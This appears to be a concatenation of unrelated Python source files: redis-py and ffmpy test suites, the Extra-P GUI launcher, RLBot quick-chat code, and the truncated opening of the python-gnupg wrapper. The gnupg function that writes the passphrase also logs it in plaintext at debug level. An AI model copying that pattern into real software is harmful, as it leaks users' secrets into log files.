class TestConnection(object):
def test_on_connect_error(self):
"""
An error in Connection.on_connect should disconnect from the server
see for details: https://github.com/andymccurdy/redis-py/issues/368
"""
# this assumes the Redis server being tested against doesn't have
# 9999 databases ;)
bad_connection = redis.Redis(db=9999)
# an error should be raised on connect
with pytest.raises(redis.RedisError):
bad_connection.info()
pool = bad_connection.connection_pool
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_disconnects_socket(self, r):
"""
If Redis raises a LOADING error, the connection should be
disconnected and a BusyLoadingError raised
"""
with pytest.raises(redis.BusyLoadingError):
r.execute_command('DEBUG', 'ERROR', 'LOADING fake message')
# TODO: Sinc we have to query the cluster before we send this DEBUG command
# we will have more then 1 connection in our pool and asserting 1 connection will
# not work.
pool = r.connection_pool
assert len(pool._available_connections) >= 1
# assert not pool._available_connections[0]._sock
@pytest.mark.xfail(reason="pipeline NYI")
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_from_pipeline_immediate_command(self, r):
"""
BusyLoadingErrors should raise from Pipelines that execute a
command immediately, like WATCH does.
"""
pipe = r.pipeline()
with pytest.raises(redis.BusyLoadingError):
pipe.immediate_execute_command('DEBUG', 'ERROR',
'LOADING fake message')
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@pytest.mark.xfail(reason="pipeline NYI")
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_from_pipeline(self, r):
"""
BusyLoadingErrors should be raised from a pipeline execution
regardless of the raise_on_error flag.
"""
pipe = r.pipeline()
pipe.execute_command('DEBUG', 'ERROR', 'LOADING fake message')
with pytest.raises(redis.BusyLoadingError):
pipe.execute()
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_read_only_error(self, r):
"READONLY errors get turned in ReadOnlyError exceptions"
with pytest.raises(redis.ReadOnlyError):
r.execute_command('DEBUG', 'ERROR', 'READONLY blah blah')
def test_connect_from_url_tcp(self):
connection = redis.Redis.from_url('redis://localhost')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'Connection',
'host=localhost,port=6379,db=0',
)
def test_connect_from_url_unix(self):
connection = redis.Redis.from_url('unix:///path/to/socket')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'UnixDomainSocketConnection',
'path=/path/to/socket,db=0',
)
|
test_cmd_execution.py
|
import os
import subprocess
import threading
import time
from unittest import mock
import pytest
from ffmpy import FFExecutableNotFoundError, FFmpeg, FFRuntimeError
def test_invalid_executable_path():
ff = FFmpeg(executable="/tmp/foo/bar/ffmpeg")
with pytest.raises(FFExecutableNotFoundError) as exc_info:
ff.run()
assert str(exc_info.value) == "Executable '/tmp/foo/bar/ffmpeg' not found"
def test_no_redirection():
global_options = "--stdin none --stdout oneline --stderr multiline --exit-code 0"
ff = FFmpeg(global_options=global_options)
stdout, stderr = ff.run()
assert stdout is None
assert stderr is None
def test_redirect_to_devnull():
global_options = "--stdin none --stdout oneline --stderr multiline --exit-code 0"
ff = FFmpeg(global_options=global_options)
devnull = open(os.devnull, "wb")
stdout, stderr = ff.run(stdout=devnull, stderr=devnull)
assert stdout is None
assert stderr is None
def test_redirect_to_pipe():
global_options = "--stdin none --stdout oneline --stderr multiline --exit-code 0"
ff = FFmpeg(global_options=global_options)
stdout, stderr = ff.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert stdout == b"This is printed to stdout"
assert stderr == b"These are\nmultiple lines\nprinted to stderr"
def test_input():
global_options = "--stdin pipe --stdout oneline --stderr multiline --exit-code 0"
ff = FFmpeg(global_options=global_options)
stdout, stderr = ff.run(
input_data=b"my input data", stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
assert stdout == b"my input data\nThis is printed to stdout"
assert stderr == b"These are\nmultiple lines\nprinted to stderr"
def test_non_zero_exitcode():
global_options = "--stdin none --stdout multiline --stderr multiline --exit-code 42"
ff = FFmpeg(global_options=global_options)
with pytest.raises(FFRuntimeError) as exc_info:
ff.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert exc_info.value.cmd == (
"ffmpeg --stdin none --stdout multiline --stderr multiline --exit-code 42"
)
assert exc_info.value.exit_code == 42
assert exc_info.value.stdout == b"These are\nmultiple lines\nprinted to stdout"
assert exc_info.value.stderr == b"These are\nmultiple lines\nprinted to stderr"
assert str(exc_info.value) == (
"`ffmpeg --stdin none --stdout multiline --stderr multiline --exit-code 42` "
"exited with status 42\n\n"
"STDOUT:\n"
"These are\n"
"multiple lines\n"
"printed to stdout\n\n"
"STDERR:\n"
"These are\n"
"multiple lines\n"
"printed to stderr"
)
def test_non_zero_exitcode_no_stderr():
global_options = "--stdin none --stdout multiline --stderr none --exit-code 42"
ff = FFmpeg(global_options=global_options)
with pytest.raises(FFRuntimeError) as exc_info:
ff.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert exc_info.value.cmd == (
"ffmpeg --stdin none --stdout multiline --stderr none --exit-code 42"
)
assert exc_info.value.exit_code == 42
assert exc_info.value.stdout == b"These are\nmultiple lines\nprinted to stdout"
assert exc_info.value.stderr == b""
assert str(exc_info.value) == (
"`ffmpeg --stdin none --stdout multiline --stderr none --exit-code 42` "
"exited with status 42\n\n"
"STDOUT:\n"
"These are\n"
"multiple lines\n"
"printed to stdout\n\n"
"STDERR:\n"
)
def test_non_zero_exitcode_no_stdout():
global_options = "--stdin none --stdout none --stderr multiline --exit-code 42"
ff = FFmpeg(global_options=global_options)
with pytest.raises(FFRuntimeError) as exc_info:
ff.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert exc_info.value.cmd == (
"ffmpeg --stdin none --stdout none --stderr multiline --exit-code 42"
)
assert exc_info.value.exit_code == 42
assert exc_info.value.stdout == b""
assert exc_info.value.stderr == b"These are\nmultiple lines\nprinted to stderr"
assert str(exc_info.value) == (
"`ffmpeg --stdin none --stdout none --stderr multiline --exit-code 42` "
"exited with status 42\n\n"
"STDOUT:\n"
"\n\n"
"STDERR:\n"
"These are\n"
"multiple lines\n"
"printed to stderr"
)
def test_non_zero_exitcode_no_stdout_and_stderr():
global_options = "--stdin none --stdout none --stderr none --exit-code 42"
ff = FFmpeg(global_options=global_options)
with pytest.raises(FFRuntimeError) as exc_info:
ff.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert exc_info.value.cmd == (
"ffmpeg --stdin none --stdout none --stderr none --exit-code 42"
)
assert exc_info.value.exit_code == 42
assert exc_info.value.stdout == b""
assert exc_info.value.stderr == b""
assert str(exc_info.value) == (
"`ffmpeg --stdin none --stdout none --stderr none --exit-code 42` "
"exited with status 42\n\n"
"STDOUT:\n"
"\n\n"
"STDERR:\n"
)
def test_raise_exception_with_stdout_stderr_none():
global_options = "--stdin none --stdout none --stderr none --exit-code 42"
ff = FFmpeg(global_options=global_options)
with pytest.raises(FFRuntimeError) as exc_info:
ff.run()
assert str(exc_info.value) == (
"`ffmpeg --stdin none --stdout none --stderr none --exit-code 42` "
"exited with status 42\n\n"
"STDOUT:\n"
"\n\n"
"STDERR:\n"
)
def test_terminate_process():
global_options = "--long-run"
ff = FFmpeg(global_options=global_options)
thread_1 = threading.Thread(target=ff.run)
thread_1.start()
while not ff.process:
time.sleep(0.05)
print(ff.process.returncode)
ff.process.terminate()
thread_1.join()
assert ff.process.returncode == -15
@mock.patch("ffmpy.subprocess.Popen")
def test_custom_env(popen_mock):
ff = FFmpeg()
popen_mock.return_value.communicate.return_value = ("output", "error")
popen_mock.return_value.returncode = 0
ff.run(env="customenv")
popen_mock.assert_called_with(
mock.ANY, stdin=mock.ANY, stdout=mock.ANY, stderr=mock.ANY, env="customenv"
)
|
extrapgui.py
|
# This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p)
#
# Copyright (c) 2020, Technical University of Darmstadt, Germany
#
# This software may be modified and distributed under the terms of a BSD-style license.
# See the LICENSE file in the base directory for details.
import argparse
import logging
import sys
import threading
import traceback
import warnings
from PySide2.QtCore import Qt
from PySide2.QtGui import QPalette, QColor
from PySide2.QtWidgets import QApplication, QMessageBox, QToolTip
from matplotlib import font_manager
import extrap
from extrap.fileio.cube_file_reader2 import read_cube_file
from extrap.fileio.experiment_io import read_experiment
from extrap.fileio.extrap3_experiment_reader import read_extrap3_experiment
from extrap.fileio.json_file_reader import read_json_file
from extrap.fileio.talpas_file_reader import read_talpas_file
from extrap.fileio.text_file_reader import read_text_file
from extrap.gui.MainWidget import MainWidget
from extrap.util.exceptions import RecoverableError, CancelProcessError
TRACEBACK = logging.DEBUG - 1
logging.addLevelName(TRACEBACK, 'TRACEBACK')
def main(*, args=None, test=False):
_update_mac_app_info()
# preload fonts for matplotlib
font_preloader = _preload_common_fonts()
arguments = parse_arguments(args)
# configure logging
log_level = min(logging.getLevelName(arguments.log_level.upper()), logging.INFO)
if arguments.log_file:
logging.basicConfig(format="%(levelname)s: %(asctime)s: %(message)s", level=log_level,
filename=arguments.log_file)
else:
logging.basicConfig(format="%(levelname)s: %(asctime)s: %(message)s", level=log_level)
logging.getLogger().handlers[0].setLevel(logging.getLevelName(arguments.log_level.upper()))
app = QApplication(sys.argv) if not test else QApplication.instance()
apply_style(app)
window = MainWidget()
_init_warning_system(window, test)
window.show()
try:
load_from_command(arguments, window)
except CancelProcessError:
pass
if not test:
app.exec_()
font_preloader.join()
else:
font_preloader.join()
return window, app
def parse_arguments(args=None):
parser = argparse.ArgumentParser(description=extrap.__description__)
parser.add_argument("--log", action="store", dest="log_level", type=str.lower, default='critical',
choices=['traceback', 'debug', 'info', 'warning', 'error', 'critical'],
help="set program's log level (default: critical)")
parser.add_argument("--logfile", action="store", dest="log_file",
help="set path of log file")
parser.add_argument("--version", action="version", version=extrap.__title__ + " " + extrap.__version__)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument("--cube", action="store_true", default=False, dest="cube", help="load data from cube files")
group.add_argument("--text", action="store_true", default=False, dest="text", help="load data from text files")
group.add_argument("--talpas", action="store_true", default=False, dest="talpas",
help="load data from talpas data format")
group.add_argument("--json", action="store_true", default=False, dest="json",
help="load data from json or jsonlines file")
group.add_argument("--extra-p-3", action="store_true", default=False, dest="extrap3",
help="load data from Extra-P 3 experiment")
parser.add_argument("path", metavar="FILEPATH", type=str, action="store", nargs='?',
help="specify a file path for Extra-P to work with")
parser.add_argument("--scaling", action="store", dest="scaling_type", default="weak", type=str.lower,
choices=["weak", "strong"],
help="set weak or strong scaling when loading data from cube files [weak (default), strong]")
arguments = parser.parse_args(args)
return arguments
def load_from_command(arguments, window):
if arguments.path:
if arguments.text:
window.import_file(read_text_file, file_name=arguments.path)
elif arguments.json:
window.import_file(read_json_file, file_name=arguments.path)
elif arguments.talpas:
window.import_file(read_talpas_file, file_name=arguments.path)
elif arguments.cube:
window.import_file(lambda x, y: read_cube_file(x, arguments.scaling_type, y), file_name=arguments.path)
elif arguments.extrap3:
window.import_file(read_extrap3_experiment, model=False, file_name=arguments.path)
else:
window.import_file(read_experiment, model=False, file_name=arguments.path)
def _init_warning_system(window, test=False):
open_message_boxes = []
current_warnings = set()
# save old handlers
_old_warnings_handler = warnings.showwarning
_old_exception_handler = sys.excepthook
def activate_box(box):
box.raise_()
box.activateWindow()
def display_messages(event):
for w in open_message_boxes:
w.raise_()
w.activateWindow()
if sys.platform.startswith('darwin'):
window.activate_event_handlers.append(display_messages)
def _warnings_handler(message: Warning, category, filename, lineno, file=None, line=None):
nonlocal current_warnings
message_str = str(message)
if message_str not in current_warnings:
warn_box = QMessageBox(QMessageBox.Warning, 'Warning', message_str, QMessageBox.Ok, window)
warn_box.setModal(False)
warn_box.setAttribute(Qt.WA_DeleteOnClose)
warn_box.destroyed.connect(
lambda x: (current_warnings.remove(message_str), open_message_boxes.remove(warn_box)))
if not test:
warn_box.show()
activate_box(warn_box)
open_message_boxes.append(warn_box)
current_warnings.add(message_str)
_old_warnings_handler(message, category, filename, lineno, file, line)
logging.warning(message_str)
logging.log(TRACEBACK, ''.join(traceback.format_stack()))
QApplication.processEvents()
def _exception_handler(type, value, traceback_):
traceback_text = ''.join(traceback.extract_tb(traceback_).format())
if issubclass(type, CancelProcessError):
logging.log(TRACEBACK, str(value))
logging.log(TRACEBACK, traceback_text)
return
parent, modal = _parent(window)
msg_box = QMessageBox(QMessageBox.Critical, 'Error', str(value), QMessageBox.Ok, parent)
print()
if hasattr(value, 'NAME'):
msg_box.setWindowTitle(getattr(value, 'NAME'))
msg_box.setDetailedText(traceback_text)
open_message_boxes.append(msg_box)
logging.error(str(value))
logging.log(TRACEBACK, traceback_text)
if test:
return _old_exception_handler(type, value, traceback_)
_old_exception_handler(type, value, traceback_)
if issubclass(type, RecoverableError):
msg_box.open()
activate_box(msg_box)
else:
activate_box(msg_box)
msg_box.exec_() # ensures waiting
exit(1)
warnings.showwarning = _warnings_handler
sys.excepthook = _exception_handler
warnings.simplefilter('always', UserWarning)
def apply_style(app):
app.setStyle('Fusion')
palette = QPalette()
palette.setColor(QPalette.Window, QColor(190, 190, 190))
palette.setColor(QPalette.WindowText, Qt.black)
palette.setColor(QPalette.Base, QColor(220, 220, 220))
palette.setColor(QPalette.AlternateBase, QColor(10, 10, 10))
palette.setColor(QPalette.Text, Qt.black)
palette.setColor(QPalette.Button, QColor(220, 220, 220))
palette.setColor(QPalette.ButtonText, Qt.black)
palette.setColor(QPalette.Highlight, QColor(31, 119, 180))
palette.setColor(QPalette.HighlightedText, Qt.white)
palette.setColor(QPalette.ToolTipBase, QColor(230, 230, 230))
palette.setColor(QPalette.ToolTipText, Qt.black)
palette.setColor(QPalette.Disabled, QPalette.Text, QColor(80, 80, 80))
palette.setColor(QPalette.Disabled, QPalette.ButtonText, QColor(80, 80, 80))
palette.setColor(QPalette.Disabled, QPalette.Button, QColor(150, 150, 150))
app.setPalette(palette)
QToolTip.setPalette(palette)
def _preload_common_fonts():
common_fonts = [
font_manager.FontProperties('sans\\-serif:style=normal:variant=normal:weight=normal:stretch=normal:size=10.0'),
'STIXGeneral', 'STIXGeneral:italic', 'STIXGeneral:weight=bold',
'STIXNonUnicode', 'STIXNonUnicode:italic', 'STIXNonUnicode:weight=bold',
'STIXSizeOneSym', 'STIXSizeTwoSym', 'STIXSizeThreeSym', 'STIXSizeFourSym', 'STIXSizeFiveSym',
'cmsy10', 'cmr10', 'cmtt10', 'cmmi10', 'cmb10', 'cmss10', 'cmex10',
'DejaVu Sans', 'DejaVu Sans:italic', 'DejaVu Sans:weight=bold', 'DejaVu Sans Mono', 'DejaVu Sans Display',
font_manager.FontProperties('sans\\-serif:style=normal:variant=normal:weight=normal:stretch=normal:size=12.0'),
font_manager.FontProperties('sans\\-serif:style=normal:variant=normal:weight=normal:stretch=normal:size=6.0')
]
def _thread(fonts):
for f in fonts:
font_manager.findfont(f)
thread = threading.Thread(target=_thread, args=(common_fonts,))
thread.start()
return thread
def _parent(window):
if not sys.platform.startswith('darwin'):
return window, False
modal = QApplication.activeModalWidget()
parent = modal if modal else window
return parent, bool(modal)
def _update_mac_app_info():
if sys.platform.startswith('darwin'):
try:
from Foundation import NSBundle # noqa
bundle = NSBundle.mainBundle()
if bundle:
app_info = bundle.localizedInfoDictionary() or bundle.infoDictionary()
if app_info:
app_info['CFBundleName'] = extrap.__title__
from AppKit import NSWindow
NSWindow.setAllowsAutomaticWindowTabbing_(False)
except ImportError:
pass
if __name__ == "__main__":
main()
|
quick_chats.py
|
import flatbuffers
import multiprocessing
import queue
from threading import Thread
from rlbot.messages.flat import QuickChat
from rlbot.messages.flat import QuickChatSelection
from rlbot.utils.logging_utils import get_logger
from rlbot.utils.structures.utils import create_enum_object
"""
Look for quick chats from here:
https://github.com/RLBot/RLBot/blob/master/src/main/flatbuffers/rlbot.fbs
"""
QuickChats = create_enum_object([chat for chat in dir(QuickChatSelection.QuickChatSelection)
if not chat.startswith('__')
and not callable(getattr(QuickChatSelection.QuickChatSelection, chat))],
list_name='quick_chat_list',
other_attributes=[
('CHAT_NONE', -1),
('CHAT_EVERYONE', False),
('CHAT_TEAM_ONLY', True)
],
attribute_object=QuickChatSelection.QuickChatSelection)
def send_quick_chat_flat(game_interface, index, team, team_only, quick_chat):
builder = flatbuffers.Builder(0)
QuickChat.QuickChatStart(builder)
QuickChat.QuickChatAddQuickChatSelection(builder, quick_chat)
QuickChat.QuickChatAddPlayerIndex(builder, index)
QuickChat.QuickChatAddTeamOnly(builder, team_only)
result = QuickChat.QuickChatEnd(builder)
builder.Finish(result)
game_interface.send_chat_flat(builder)
def send_quick_chat(queue_holder, index, team, team_only, quick_chat):
"""
Sends a quick chat to the general queue for everyone to pull from
:param queue_holder:
:param index: The index of the player sending the message
:param team: The team of the player sending the message
:param team_only: if the message is team only
:param quick_chat: The contents of the quick chat
:return:
"""
queue_holder["output"].put((index, team, team_only, quick_chat))
def register_for_quick_chat(queue_holder, called_func, quit_event):
"""
Registers a function to be called anytime this queue gets a quick chat.
:param queue_holder: This holds the queues for the bots
:param called_func: This is the function that is called when a quick chat is received
:param quit_event: This event will be set when rlbot is trying to shut down
:return: The newly created thread.
"""
def threaded_func(chat_queue, called_func, quit_event):
while not quit_event.is_set():
try:
next_message = chat_queue.get(timeout=0.01)
index, team, chat = next_message
called_func(index, team, chat)
except queue.Empty:
pass
return
thread = Thread(target=threaded_func, args=(queue_holder["input"], called_func, quit_event))
thread.start()
return thread
class QuickChatManager:
bot_queues = {}
def __init__(self, game_interface):
self.game_interface = game_interface
self.manager = multiprocessing.Manager()
self.general_chat_queue = self.manager.Queue()
self.logger = get_logger('chats')
def create_queue_for_bot(self, index, team):
bot_queue = self.manager.Queue()
queue_holder = dict()
queue_holder["input"] = bot_queue
queue_holder["output"] = self.general_chat_queue
self.bot_queues[index] = (team, bot_queue)
return queue_holder
def process_queue(self, quit_event):
while not quit_event.is_set():
try:
next_message = self.general_chat_queue.get(timeout=0.01)
index, team, team_only, message_details = next_message
self.logger.debug('got quick chat from bot %s on team %s with message %s:', index, team,
QuickChats.quick_chat_list[message_details])
for i in self.bot_queues:
bots = self.bot_queues[i]
if i == index:
# do not send yourself a message
continue
if bots[0] != team and team_only:
# do not send to other team if team only
continue
bots[1].put((index, team, message_details))
self.game_interface.send_chat(index, team_only, message_details)
except queue.Empty:
pass
def start_manager(self, quit_event):
thread = Thread(target=self.process_queue, args=(quit_event,))
thread.start()
return thread
|
_gnupg.py
|
# Copyright (c) 2008-2011 by Vinay Sajip.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name(s) of the copyright holder(s) may not be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER(S) "AS IS" AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE COPYRIGHT HOLDER(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
""" A wrapper for the 'gpg' command::
Portions of this module are derived from A.M. Kuchling's well-designed
GPG.py, using Richard Jones' updated version 1.3, which can be found
in the pycrypto CVS repository on Sourceforge:
http://pycrypto.cvs.sourceforge.net/viewvc/pycrypto/gpg/GPG.py
This module is *not* forward-compatible with amk's; some of the
old interface has changed. For instance, since I've added decrypt
functionality, I elected to initialize with a 'gnupghome' argument
instead of 'keyring', so that gpg can find both the public and secret
keyrings. I've also altered some of the returned objects in order for
the caller to not have to know as much about the internals of the
result classes.
While the rest of ISconf is released under the GPL, I am releasing
this single file under the same terms that A.M. Kuchling used for
pycrypto.
Steve Traugott, stevegt@terraluna.org
Thu Jun 23 21:27:20 PDT 2005
This version of the module has been modified from Steve Traugott's version
(see http://trac.t7a.org/isconf/browser/trunk/lib/python/isconf/GPG.py) by
Vinay Sajip to make use of the subprocess module (Steve's version uses os.fork()
and so does not work on Windows). Renamed to gnupg.py to avoid confusion with
the previous versions.
Modifications Copyright (C) 2008-2011 Vinay Sajip. All rights reserved.
A unittest harness (test_gnupg.py) has also been added.
"""
import locale
__author__ = "Vinay Sajip"
__date__ = "$02-Sep-2011 13:18:12$"
try:
from io import StringIO
except ImportError:
from cStringIO import StringIO
import codecs
import locale
import logging
import os
import socket
from subprocess import Popen
from subprocess import PIPE
import sys
import threading
try:
import logging.NullHandler as NullHandler
except ImportError:
class NullHandler(logging.Handler):
def handle(self, record):
pass
try:
unicode
_py3k = False
except NameError:
_py3k = True
logger = logging.getLogger(__name__)
if not logger.handlers:
logger.addHandler(NullHandler())
def _copy_data(instream, outstream):
# Copy one stream to another
sent = 0
if hasattr(sys.stdin, 'encoding'):
enc = sys.stdin.encoding
else:
enc = 'ascii'
while True:
data = instream.read(1024)
if len(data) == 0:
break
sent += len(data)
logger.debug("sending chunk (%d): %r", sent, data[:256])
try:
outstream.write(data)
except UnicodeError:
outstream.write(data.encode(enc))
except:
# Can sometimes get 'broken pipe' errors even when the data has all
# been sent
logger.exception('Error sending data')
break
try:
outstream.close()
except IOError:
logger.warning('Exception occurred while closing: ignored', exc_info=1)
logger.debug("closed output, %d bytes sent", sent)
def _threaded_copy_data(instream, outstream):
wr = threading.Thread(target=_copy_data, args=(instream, outstream))
wr.setDaemon(True)
logger.debug('data copier: %r, %r, %r', wr, instream, outstream)
wr.start()
return wr
def _write_passphrase(stream, passphrase, encoding):
passphrase = '%s\n' % passphrase
passphrase = passphrase.encode(encoding)
stream.write(passphrase)
logger.debug("Wrote passphrase: %r", passphrase)
def _is_sequence(instance):
return isinstance(instance,list) or isinstance(instance,tuple)
def _make_binary_stream(s, encoding):
try:
if _py3k:
if isinstance(s, str):
s = s.encode(encoding)
else:
if type(s) is not str:
s = s.encode(encoding)
from io import BytesIO
rv = BytesIO(s)
except ImportError:
rv = StringIO(s)
return rv
class Verify(object):
"Handle status messages for --verify"
def __init__(self, gpg):
self.gpg = gpg
self.valid = False
self.fingerprint = self.creation_date = self.timestamp = None
self.signature_id = self.key_id = None
self.username = None
def __nonzero__(self):
return self.valid
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in ("TRUST_UNDEFINED", "TRUST_NEVER", "TRUST_MARGINAL",
"TRUST_FULLY", "TRUST_ULTIMATE", "RSA_OR_IDEA", "NODATA",
"IMPORT_RES", "PLAINTEXT", "PLAINTEXT_LENGTH"):
pass
elif key == "BADSIG":
self.valid = False
self.status = 'signature bad'
self.key_id, self.username = value.split(None, 1)
elif key == "GOODSIG":
self.valid = True
self.status = 'signature good'
self.key_id, self.username = value.split(None, 1)
elif key == "VALIDSIG":
(self.fingerprint,
self.creation_date,
self.sig_timestamp,
self.expire_timestamp) = value.split()[:4]
# may be different if signature is made with a subkey
self.pubkey_fingerprint = value.split()[-1]
self.status = 'signature valid'
elif key == "SIG_ID":
(self.signature_id,
self.creation_date, self.timestamp) = value.split()
elif key == "ERRSIG":
self.valid = False
(self.key_id,
algo, hash_algo,
cls,
self.timestamp) = value.split()[:5]
self.status = 'signature error'
elif key == "NO_PUBKEY":
self.valid = False
self.key_id = value
self.status = 'no public key'
elif key in ("KEYEXPIRED", "SIGEXPIRED"):
# these are useless in verify, since they are spit out for any
# pub/subkeys on the key, not just the one doing the signing.
# if we want to check for signatures with expired key,
# the relevant flag is EXPKEYSIG.
pass
elif key in ("EXPKEYSIG", "REVKEYSIG"):
# signed with expired or revoked key
self.valid = False
self.key_id = value.split()[0]
self.status = (('%s %s') % (key[:3], key[3:])).lower()
else:
raise ValueError("Unknown status message: %r" % key)
class ImportResult(object):
"Handle status messages for --import"
counts = '''count no_user_id imported imported_rsa unchanged
n_uids n_subk n_sigs n_revoc sec_read sec_imported
sec_dups not_imported'''.split()
def __init__(self, gpg):
self.gpg = gpg
self.imported = []
self.results = []
self.fingerprints = []
for result in self.counts:
setattr(self, result, None)
def __nonzero__(self):
if self.not_imported: return False
if not self.fingerprints: return False
return True
__bool__ = __nonzero__
ok_reason = {
'0': 'Not actually changed',
'1': 'Entirely new key',
'2': 'New user IDs',
'4': 'New signatures',
'8': 'New subkeys',
'16': 'Contains private key',
}
problem_reason = {
'0': 'No specific reason given',
'1': 'Invalid Certificate',
'2': 'Issuer Certificate missing',
'3': 'Certificate Chain too long',
'4': 'Error storing certificate',
}
def handle_status(self, key, value):
if key == "IMPORTED":
# this duplicates info we already see in import_ok & import_problem
pass
elif key == "NODATA":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'No valid data found'})
elif key == "IMPORT_OK":
reason, fingerprint = value.split()
reasons = []
for code, text in list(self.ok_reason.items()):
if int(reason) | int(code) == int(reason):
reasons.append(text)
reasontext = '\n'.join(reasons) + "\n"
self.results.append({'fingerprint': fingerprint,
'ok': reason, 'text': reasontext})
self.fingerprints.append(fingerprint)
elif key == "IMPORT_PROBLEM":
try:
reason, fingerprint = value.split()
except:
reason = value
fingerprint = '<unknown>'
self.results.append({'fingerprint': fingerprint,
'problem': reason, 'text': self.problem_reason[reason]})
elif key == "IMPORT_RES":
import_res = value.split()
for i in range(len(self.counts)):
setattr(self, self.counts[i], int(import_res[i]))
elif key == "KEYEXPIRED":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Key expired'})
elif key == "SIGEXPIRED":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Signature expired'})
else:
raise ValueError("Unknown status message: %r" % key)
def summary(self):
l = []
l.append('%d imported'%self.imported)
if self.not_imported:
l.append('%d not imported'%self.not_imported)
return ', '.join(l)
class ListKeys(list):
''' Handle status messages for --list-keys.
Handle pub and uid (relating the latter to the former).
Don't care about (info from src/DETAILS):
crt = X.509 certificate
crs = X.509 certificate and private key available
sub = subkey (secondary key)
ssb = secret subkey (secondary key)
uat = user attribute (same as user id except for field 10).
sig = signature
rev = revocation signature
pkd = public key data (special field format, see below)
grp = reserved for gpgsm
rvk = revocation key
'''
def __init__(self, gpg):
self.gpg = gpg
self.curkey = None
self.fingerprints = []
self.uids = []
def key(self, args):
vars = ("""
type trust length algo keyid date expires dummy ownertrust uid
""").split()
self.curkey = {}
for i in range(len(vars)):
self.curkey[vars[i]] = args[i]
self.curkey['uids'] = []
if self.curkey['uid']:
self.curkey['uids'].append(self.curkey['uid'])
del self.curkey['uid']
self.append(self.curkey)
pub = sec = key
def fpr(self, args):
self.curkey['fingerprint'] = args[9]
self.fingerprints.append(args[9])
def uid(self, args):
self.curkey['uids'].append(args[9])
self.uids.append(args[9])
def handle_status(self, key, value):
pass
class Crypt(Verify):
"Handle status messages for --encrypt and --decrypt"
def __init__(self, gpg):
Verify.__init__(self, gpg)
self.data = ''
self.ok = False
self.status = ''
def __nonzero__(self):
if self.ok: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.data.decode(self.gpg.encoding, self.gpg.decode_errors)
def handle_status(self, key, value):
if key in ("ENC_TO", "USERID_HINT", "GOODMDC", "END_DECRYPTION",
"BEGIN_SIGNING", "NO_SECKEY", "ERROR", "NODATA"):
# in the case of ERROR, this is because a more specific error
# message will have come first
pass
elif key in ("NEED_PASSPHRASE", "BAD_PASSPHRASE", "GOOD_PASSPHRASE",
"MISSING_PASSPHRASE", "DECRYPTION_FAILED",
"KEY_NOT_CREATED"):
self.status = key.replace("_", " ").lower()
elif key == "NEED_PASSPHRASE_SYM":
self.status = 'need symmetric passphrase'
elif key == "BEGIN_DECRYPTION":
self.status = 'decryption incomplete'
elif key == "BEGIN_ENCRYPTION":
self.status = 'encryption incomplete'
elif key == "DECRYPTION_OKAY":
self.status = 'decryption ok'
self.ok = True
elif key == "END_ENCRYPTION":
self.status = 'encryption ok'
self.ok = True
elif key == "INV_RECP":
self.status = 'invalid recipient'
elif key == "KEYEXPIRED":
self.status = 'key expired'
elif key == "SIG_CREATED":
self.status = 'sig created'
elif key == "SIGEXPIRED":
self.status = 'sig expired'
else:
Verify.handle_status(self, key, value)
class GenKey(object):
"Handle status messages for --gen-key"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.fingerprint = None
def __nonzero__(self):
if self.fingerprint: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.fingerprint or ''
def handle_status(self, key, value):
if key in ("PROGRESS", "GOOD_PASSPHRASE", "NODATA"):
pass
elif key == "KEY_CREATED":
(self.type,self.fingerprint) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class DeleteResult(object):
"Handle status messages for --delete-key and --delete-secret-key"
def __init__(self, gpg):
self.gpg = gpg
self.status = 'ok'
def __str__(self):
return self.status
problem_reason = {
'1': 'No such key',
'2': 'Must delete secret key first',
'3': 'Ambigious specification',
}
def handle_status(self, key, value):
if key == "DELETE_PROBLEM":
